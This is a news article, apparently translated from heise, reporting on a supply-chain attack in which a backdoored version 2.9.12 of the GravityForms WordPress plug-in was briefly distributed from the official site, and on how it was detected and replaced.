GravityForms: WordPress-Plug-in in Supply-Chain-Attacke infiziert
IT researchers have discovered an infected version of the WordPress plug-in GravityForms, which is used millions of times.
(Image: Primakov/Shutterstock.com)
Malicious actors have posted infected versions of the GravityForms plug-in for the WordPress content management system for download on the official website. The manipulated version of the plug-in, which has been installed more than a million times, contains a backdoor that allows attackers to completely compromise the WordPress instance.
According to IT researchers at Patchstack, the discoverer of the malware-infected plug-in downloaded GravityForms from the official website "gravityforms.com" last Friday. However, this made HTTP requests to the suspicious domain gravityapi.com, which was only created on Tuesday last week. The request to this domain was so slow that it was detected by the discoverer's monitoring systems.
Infection apparently not widespread
The analysts contacted several major web hosts and had them search for the Indicators of Compromise (IOCs). It turned out that the infection is not widespread; the backdoored plug-in was only available for a short time and was only downloaded by a few victims. During the investigation, Patchstack discovered that Groundhog is also affected by the supply chain attack. Patchstack does not discuss the extent to which supply chain attacks are involved in this context.
The backdoor in the GravityForms plug-in has opened up several options for the attackers. For example, they were able to create new accounts with administrator roles, upload arbitrary files to the server or delete user accounts. On Saturday, Patchstack observed backdoor activities in which the attackers sent an encrypted call to the gf_api_token parameter.
Videos by heise
The discoverer of the manipulated version also contacted the programmers of the RocketGenius plug-in. He received feedback from them a little later: Version 2.9.12 of the plug-in was infected. The plug-in was replaced by a clean version, initially without raising the version number. The developers did this later on Friday and uploaded version 2.9.13. The domain gravityapi.org has been shut down by the domain registrar Namecheap.
Last week, a vulnerability was discovered in the WordPress plug-in SureForms. Attackers can also completely compromise the WordPress instance through the vulnerability in the plug-in used on more than 200,000 websites.
(dmk)
